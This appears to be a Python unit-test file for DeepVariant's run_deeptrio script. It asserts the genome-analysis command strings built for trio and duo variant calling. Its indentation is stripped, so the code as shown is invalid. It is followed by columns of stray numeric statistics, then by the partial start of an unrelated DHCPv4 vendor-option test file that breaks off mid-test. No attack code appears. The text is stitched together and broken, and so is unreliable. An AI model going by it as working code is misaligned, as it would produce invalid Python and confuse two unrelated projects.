# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Tests for deepvariant .run_deeptrio."""
import io
from unittest import mock
from absl import flags
from absl.testing import absltest
from absl.testing import flagsaver
from absl.testing import parameterized
import six
from deepvariant.opensource_only.scripts import run_deeptrio
FLAGS = flags.FLAGS
# pylint: disable=line-too-long
class RunDeeptrioTest(parameterized.TestCase):
def _create_all_commands_and_check_stdout(self, expected_stdout=None):
with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
commands, postprocess_cmds = run_deeptrio.create_all_commands(
'/tmp/deeptrio_tmp_output')
# Confirm that these basic commands don't have extra messages printed out
# to stdout.
if expected_stdout is None:
self.assertEmpty(mock_stdout.getvalue())
else:
self.assertEqual(mock_stdout.getvalue(), expected_stdout)
return commands, postprocess_cmds
@parameterized.parameters('WGS', 'WES', 'PACBIO')
@flagsaver.flagsaver
def test_call_variants_postprocess_variants_commands(self, model_type):
FLAGS.model_type = model_type
FLAGS.ref = 'your_ref'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.output_gvcf_merged = 'your_gvcf_merged'
FLAGS.num_shards = 64
commands, postprocess_cmds = self._create_all_commands_and_check_stdout()
self.assertEqual(
commands[1], 'time /opt/deepvariant/bin/call_variants '
'--outfile '
'"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
'--examples "/tmp/deeptrio_tmp_output/make_examples_child.tfrecord@64.gz" '
'--checkpoint "/opt/models/deeptrio/{}/child/model.ckpt"'.format(
model_type.lower()))
self.assertEqual(
commands[2], 'time /opt/deepvariant/bin/call_variants '
'--outfile '
'"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
'--examples "/tmp/deeptrio_tmp_output/make_examples_parent1.tfrecord@64.gz" '
'--checkpoint "/opt/models/deeptrio/{}/parent/model.ckpt"'.format(
model_type.lower()))
self.assertEqual(
commands[3], 'time /opt/deepvariant/bin/call_variants '
'--outfile '
'"/tmp/deeptrio_tmp_output/call_variants_output_parent2.tfrecord.gz" '
'--examples "/tmp/deeptrio_tmp_output/make_examples_parent2.tfrecord@64.gz" '
'--checkpoint "/opt/models/deeptrio/{}/parent/model.ckpt"'.format(
model_type.lower()))
self.assertEqual(
postprocess_cmds[0], 'time /opt/deepvariant/bin/postprocess_variants '
'--ref "your_ref" '
'--infile '
'"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
'--outfile "your_vcf_child" '
'--nonvariant_site_tfrecord_path '
'"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
'--gvcf_outfile "your_gvcf_child"')
self.assertEqual(
postprocess_cmds[1], 'time /opt/deepvariant/bin/postprocess_variants '
'--ref "your_ref" '
'--infile '
'"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
'--outfile "your_vcf_parent1" '
'--nonvariant_site_tfrecord_path '
'"/tmp/deeptrio_tmp_output/gvcf_parent1.tfrecord@64.gz" '
'--gvcf_outfile "your_gvcf_parent1"')
self.assertEqual(
postprocess_cmds[2], 'time /opt/deepvariant/bin/postprocess_variants '
'--ref "your_ref" '
'--infile '
'"/tmp/deeptrio_tmp_output/call_variants_output_parent2.tfrecord.gz" '
'--outfile "your_vcf_parent2" '
'--nonvariant_site_tfrecord_path '
'"/tmp/deeptrio_tmp_output/gvcf_parent2.tfrecord@64.gz" '
'--gvcf_outfile "your_gvcf_parent2"')
self.assertLen(commands, 4)
self.assertLen(postprocess_cmds, 3)
@parameterized.parameters('WGS', 'WES', 'PACBIO')
@flagsaver.flagsaver
def test_duo_call_variants_postprocess_variants_commands(self, model_type):
FLAGS.model_type = model_type
FLAGS.ref = 'your_ref'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_merged = 'your_gvcf_merged'
FLAGS.num_shards = 64
commands, postprocess_cmds = self._create_all_commands_and_check_stdout()
self.assertEqual(
commands[1], 'time /opt/deepvariant/bin/call_variants '
'--outfile '
'"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
'--examples "/tmp/deeptrio_tmp_output/make_examples_child.tfrecord@64.gz" '
'--checkpoint "/opt/models/deeptrio/{}/child/model.ckpt"'.format(
model_type.lower()))
self.assertEqual(
commands[2], 'time /opt/deepvariant/bin/call_variants '
'--outfile '
'"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
'--examples "/tmp/deeptrio_tmp_output/make_examples_parent1.tfrecord@64.gz" '
'--checkpoint "/opt/models/deeptrio/{}/parent/model.ckpt"'.format(
model_type.lower()))
self.assertEqual(
postprocess_cmds[0], 'time /opt/deepvariant/bin/postprocess_variants '
'--ref "your_ref" '
'--infile '
'"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
'--outfile "your_vcf_child" '
'--nonvariant_site_tfrecord_path '
'"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
'--gvcf_outfile "your_gvcf_child"')
self.assertEqual(
postprocess_cmds[1], 'time /opt/deepvariant/bin/postprocess_variants '
'--ref "your_ref" '
'--infile '
'"/tmp/deeptrio_tmp_output/call_variants_output_parent1.tfrecord.gz" '
'--outfile "your_vcf_parent1" '
'--nonvariant_site_tfrecord_path '
'"/tmp/deeptrio_tmp_output/gvcf_parent1.tfrecord@64.gz" '
'--gvcf_outfile "your_gvcf_parent1"')
# pylint: disable=g-generic-assert
self.assertLen(commands, 3)
self.assertLen(postprocess_cmds, 2)
@parameterized.parameters(
('WGS', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '),
('WES', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--pileup_image_height_child "100" '
'--pileup_image_height_parent "100" '),
('PACBIO', '--add_hp_channel '
'--alt_aligned_pileup "diff_channels" '
'--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--noparse_sam_aux_fields '
'--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '
'--pileup_image_width "199" '
'--norealign_reads '
'--nosort_by_haplotypes '
'--vsc_min_fraction_indels "0.12" '))
@flagsaver.flagsaver
def test_make_examples_commands_with_types(self, model_type,
extra_args_plus_gvcf):
FLAGS.model_type = model_type
FLAGS.ref = 'your_ref'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.output_gvcf_merged = 'your_gvcf_merged'
FLAGS.num_shards = 64
commands, _ = self._create_all_commands_and_check_stdout()
self.assertEqual(
commands[0], 'time seq 0 63 '
'| parallel -q --halt 2 --line-buffer '
'/opt/deepvariant/bin/deeptrio/make_examples '
'--mode calling '
'--ref "your_ref" '
'--reads_parent1 "your_bam_parent1" '
'--reads_parent2 "your_bam_parent2" '
'--reads "your_bam_child" '
'--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
'--sample_name "your_sample_child" '
'--sample_name_parent1 "your_sample_parent1" '
'--sample_name_parent2 "your_sample_parent2" '
'%s'
'--task {}' % extra_args_plus_gvcf)
@parameterized.parameters(
('WGS', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '),
('WES', '--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--pileup_image_height_child "100" '
'--pileup_image_height_parent "100" '),
('PACBIO', '--add_hp_channel '
'--alt_aligned_pileup "diff_channels" '
'--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--noparse_sam_aux_fields '
'--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '
'--pileup_image_width "199" '
'--norealign_reads '
'--nosort_by_haplotypes '
'--vsc_min_fraction_indels "0.12" '))
@flagsaver.flagsaver
def test_duo_make_examples_commands_with_types(self, model_type,
extra_args_plus_gvcf):
FLAGS.model_type = model_type
FLAGS.ref = 'your_ref'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_merged = 'your_gvcf_merged'
FLAGS.num_shards = 64
commands, _ = self._create_all_commands_and_check_stdout()
self.assertEqual(
commands[0], 'time seq 0 63 '
'| parallel -q --halt 2 --line-buffer '
'/opt/deepvariant/bin/deeptrio/make_examples '
'--mode calling '
'--ref "your_ref" '
'--reads_parent1 "your_bam_parent1" '
'--reads "your_bam_child" '
'--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
'--sample_name "your_sample_child" '
'--sample_name_parent1 "your_sample_parent1" '
'%s'
'--task {}' % extra_args_plus_gvcf)
@parameterized.parameters(
(None, '--add_hp_channel '
'--alt_aligned_pileup "diff_channels" '
'--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--noparse_sam_aux_fields '
'--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '
'--pileup_image_width "199" '
'--norealign_reads '
'--nosort_by_haplotypes '
'--vsc_min_fraction_indels "0.12" ', None),
('alt_aligned_pileup="rows",vsc_min_fraction_indels=0.03',
'--add_hp_channel '
'--alt_aligned_pileup "rows" '
'--gvcf "/tmp/deeptrio_tmp_output/gvcf.tfrecord@64.gz" '
'--noparse_sam_aux_fields '
'--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '
'--pileup_image_width "199" '
'--norealign_reads '
'--nosort_by_haplotypes '
'--vsc_min_fraction_indels "0.03" ',
'\nWarning: --alt_aligned_pileup is previously set to diff_channels, '
'now to "rows".\n'
'\nWarning: --vsc_min_fraction_indels is previously set to 0.12, '
'now to 0.03.\n'),
)
@flagsaver.flagsaver
def test_pacbio_args_overwrite(self, make_examples_extra_args, expected_args,
expected_stdout):
"""Confirms that adding extra flags can overwrite the default from mode."""
FLAGS.model_type = 'PACBIO'
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.num_shards = 64
FLAGS.regions = None
FLAGS.make_examples_extra_args = make_examples_extra_args
commands, _ = self._create_all_commands_and_check_stdout(expected_stdout)
self.assertEqual(
commands[0], 'time seq 0 63 | parallel -q --halt 2 --line-buffer '
'/opt/deepvariant/bin/deeptrio/make_examples --mode calling '
'--ref "your_ref" --reads_parent1 "your_bam_parent1" '
'--reads_parent2 "your_bam_parent2" '
'--reads "your_bam_child" '
'--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
'--sample_name "your_sample_child" '
'--sample_name_parent1 "your_sample_parent1" '
'--sample_name_parent2 "your_sample_parent2" '
'%s'
'--task {}' % expected_args)
@parameterized.parameters(
(None, ('sort_by_haplotypes=true,parse_sam_aux_fields=true'), True),
(True, ('sort_by_haplotypes=true,parse_sam_aux_fields=true'), False),
)
@flagsaver.flagsaver
def test_use_hp_information_conflicts(self, use_hp_information,
make_examples_extra_args, has_conflict):
"""Confirms that PacBio use_hp_information can conflict with HP args."""
FLAGS.model_type = 'PACBIO'
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.num_shards = 64
FLAGS.regions = None
FLAGS.use_hp_information = use_hp_information
FLAGS.make_examples_extra_args = make_examples_extra_args
if has_conflict:
with six.assertRaisesRegex(self, ValueError,
'conflicts with other flags'):
run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')
else:
# Otherwise, the command should run without rasing errors.
run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')
@parameterized.parameters('WGS', 'WES')
@flagsaver.flagsaver
def test_use_hp_information_only_with_pacbio(self, model_type):
"""Confirms use_hp_information only works for."""
FLAGS.model_type = model_type
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.num_shards = 64
FLAGS.regions = None
FLAGS.use_hp_information = True
with six.assertRaisesRegex(
self, ValueError, '--use_hp_information can only be used with '
'--model_type="PACBIO"'):
run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')
@parameterized.parameters(
('chr1:20-30', '--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '
'--regions "chr1:20-30"'),
('chr1:20-30 chr2:100-200', '--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '
'--regions "chr1:20-30 chr2:100-200"'),
("'chr1:20-30 chr2:100-200'", '--pileup_image_height_child "60" '
'--pileup_image_height_parent "40" '
"--regions 'chr1:20-30 chr2:100-200'"),
)
def test_make_examples_regions(self, regions, expected_args):
FLAGS.model_type = 'WGS'
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.num_shards = 64
FLAGS.regions = regions
commands, _ = self._create_all_commands_and_check_stdout()
self.assertEqual(
commands[0], 'time seq 0 63 | parallel -q --halt 2 --line-buffer '
'/opt/deepvariant/bin/deeptrio/make_examples --mode calling '
'--ref "your_ref" --reads_parent1 "your_bam_parent1" '
'--reads_parent2 "your_bam_parent2" '
'--reads "your_bam_child" '
'--examples "/tmp/deeptrio_tmp_output/make_examples.tfrecord@64.gz" '
'--sample_name "your_sample_child" '
'--sample_name_parent1 "your_sample_parent1" '
'--sample_name_parent2 "your_sample_parent2" '
'%s '
'--task {}' % expected_args)
@flagsaver.flagsaver
def test_make_examples_extra_args_invalid(self):
FLAGS.model_type = 'WGS'
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.num_shards = 64
FLAGS.make_examples_extra_args = 'keep_secondary_alignments'
with six.assertRaisesRegex(self, ValueError, 'not enough values to unpack'):
_, _ = run_deeptrio.create_all_commands('/tmp/deeptrio_tmp_output')
@parameterized.parameters(
('batch_size=1024', '--batch_size "1024"'),
('batch_size=4096,'
'config_string="gpu_options: {per_process_gpu_memory_fraction: 0.5}"',
'--batch_size "4096" '
'--config_string "gpu_options: {per_process_gpu_memory_fraction: 0.5}"'),
)
@flagsaver.flagsaver
def test_call_variants_extra_args(self, call_variants_extra_args,
expected_args):
FLAGS.model_type = 'WGS'
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.num_shards = 64
FLAGS.call_variants_extra_args = call_variants_extra_args
commands, _ = self._create_all_commands_and_check_stdout()
self.assertEqual(
commands[1], 'time /opt/deepvariant/bin/call_variants '
'--outfile '
'"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
'--examples "/tmp/deeptrio_tmp_output/make_examples_child.tfrecord@64.gz" '
'--checkpoint "/opt/models/deeptrio/wgs/child/model.ckpt" '
'%s' % expected_args)
@parameterized.parameters(
('qual_filter=3.0', '--qual_filter "3.0"'),)
@flagsaver.flagsaver
def test_postprocess_variants_extra_args(self,
postprocess_variants_extra_args,
expected_args):
FLAGS.model_type = 'WGS'
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.num_shards = 64
FLAGS.postprocess_variants_extra_args = postprocess_variants_extra_args
_, commands_post_process = self._create_all_commands_and_check_stdout()
self.assertEqual(
commands_post_process[0],
'time /opt/deepvariant/bin/postprocess_variants '
'--ref "your_ref" '
'--infile '
'"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
'--outfile "your_vcf_child" '
'--nonvariant_site_tfrecord_path '
'"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
'--gvcf_outfile "your_gvcf_child" '
'%s' % expected_args)
@parameterized.parameters(
(True, 'vcf_stats_report=true', '--vcf_stats_report'),
(True, 'vcf_stats_report=false', '--novcf_stats_report'),
# These two cases demonstrate we might end up havig duplicated and
# potentially conflicting flags when using *extra_args.
(False, 'vcf_stats_report=true', '--novcf_stats_report --vcf_stats_report'
),
(False, 'vcf_stats_report=false',
'--novcf_stats_report --novcf_stats_report'),
)
@flagsaver.flagsaver
def test_postprocess_variants_duplicate_extra_args(
self, vcf_stats_report, postprocess_variants_extra_args,
expected_vcf_stats_report):
FLAGS.model_type = 'WGS'
FLAGS.ref = 'your_ref'
FLAGS.sample_name_child = 'your_sample_child'
FLAGS.sample_name_parent1 = 'your_sample_parent1'
FLAGS.sample_name_parent2 = 'your_sample_parent2'
FLAGS.reads_child = 'your_bam_child'
FLAGS.reads_parent1 = 'your_bam_parent1'
FLAGS.reads_parent2 = 'your_bam_parent2'
FLAGS.output_vcf_child = 'your_vcf_child'
FLAGS.output_vcf_parent1 = 'your_vcf_parent1'
FLAGS.output_vcf_parent2 = 'your_vcf_parent2'
FLAGS.output_gvcf_child = 'your_gvcf_child'
FLAGS.output_gvcf_parent1 = 'your_gvcf_parent1'
FLAGS.output_gvcf_parent2 = 'your_gvcf_parent2'
FLAGS.num_shards = 64
FLAGS.vcf_stats_report = vcf_stats_report
FLAGS.postprocess_variants_extra_args = postprocess_variants_extra_args
_, commands_post_process = run_deeptrio.create_all_commands(
'/tmp/deeptrio_tmp_output')
self.assertEqual(
commands_post_process[0],
'time /opt/deepvariant/bin/postprocess_variants '
'--ref "your_ref" '
'--infile '
'"/tmp/deeptrio_tmp_output/call_variants_output_child.tfrecord.gz" '
'--outfile "your_vcf_child" '
'--nonvariant_site_tfrecord_path '
'"/tmp/deeptrio_tmp_output/gvcf_child.tfrecord@64.gz" '
'--gvcf_outfile "your_gvcf_child" '
'%s' % expected_vcf_stats_report)
if __name__ == '__main__':
absltest.main()
| 44.599659
| 85
| 0.700076
| 3,291
| 26,180
| 5.164388
| 0.103616
| 0.044658
| 0.036244
| 0.051777
| 0.825606
| 0.802659
| 0.790009
| 0.776653
| 0.769828
| 0.738997
| 0
| 0.023534
| 0.190107
| 26,180
| 586
| 86
| 44.675768
| 0.77805
| 0.076623
| 0
| 0.806513
| 0
| 0
| 0.439819
| 0.209461
| 0
| 0
| 0
| 0
| 0.049808
| 1
| 0.024904
| false
| 0
| 0.015326
| 0
| 0.044061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b717073da77a0968e1ff451213c990ebcc1eb911
| 20,015
|
py
|
Python
|
tests/dhcpv4/options/test_v4_vendor_options.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv4/options/test_v4_vendor_options.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv4/options/test_v4_vendor_options.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""DHCPv4 vendor specific information"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import srv_msg
import misc
from forge_cfg import world
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
def test_v4_options_vendor_encapsulated_space():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
srv_control.config_srv_custom_opt_space('vendor-encapsulated-options-space',
'foo',
1,
'uint16',
66)
srv_control.config_srv_opt('vendor-encapsulated-options', '$(EMPTY)')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(43)
# option 43 should have suboption code: 1 length: 2 with value 66 (hex:42)
srv_msg.response_check_option_content(43, 'value', 'HEX:01020042')
@pytest.mark.v4
@pytest.mark.options
@pytest.mark.vendor
@pytest.mark.private
def test_v4_options_vendor_encapsulated_space_private_iPXE():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.50-192.168.50.50')
srv_control.config_srv_custom_opt_space('APC', 'cookie', 1, 'string', 'global-value')
srv_control.config_srv_custom_opt_space('PXE', 'mtftp-ip', 1, 'ipv4-address', '0.0.0.0')
srv_control.create_new_class('APC')
srv_control.add_test_to_class(1, 'test', 'option[vendor-class-identifier].text == \'APC\'')
srv_control.add_test_to_class(1,
'option-def',
{"name": "vendor-encapsulated-options", "code": 43,
"type": "empty", "encapsulate": "APC"})
srv_control.add_test_to_class(1,
'option-data',
{"name": "cookie", "space": "APC", "data": "1APC"})
srv_control.add_test_to_class(1,
'option-data',
{"name": "vendor-encapsulated-options"})
srv_control.create_new_class('PXE')
srv_control.add_test_to_class(2, 'test', 'option[vendor-class-identifier].text == \'PXE\'')
srv_control.add_test_to_class(2,
'option-def',
{"name": "vendor-encapsulated-options", "code": 43,
"type": "empty", "encapsulate": "PXE"})
srv_control.add_test_to_class(2,
'option-data',
{"name": "mtftp-ip", "space": "PXE", "data": "1.2.3.4"})
srv_control.add_test_to_class(2,
'option-data',
{"name": "vendor-encapsulated-options"})
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_does_include_with_value('vendor_class_id', 'PXE')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(43)
# option 43 should have suboption code: 1 length: 4 with value(v4 address) 1.2.3.4
srv_msg.response_check_option_content(43, 'value', 'HEX:010401020304')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_requests_option(43)
srv_msg.client_does_include_with_value('client_id', 'ff:01:02:03:ff:04:11:22')
srv_msg.client_does_include_with_value('vendor_class_id', 'APC')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(43)
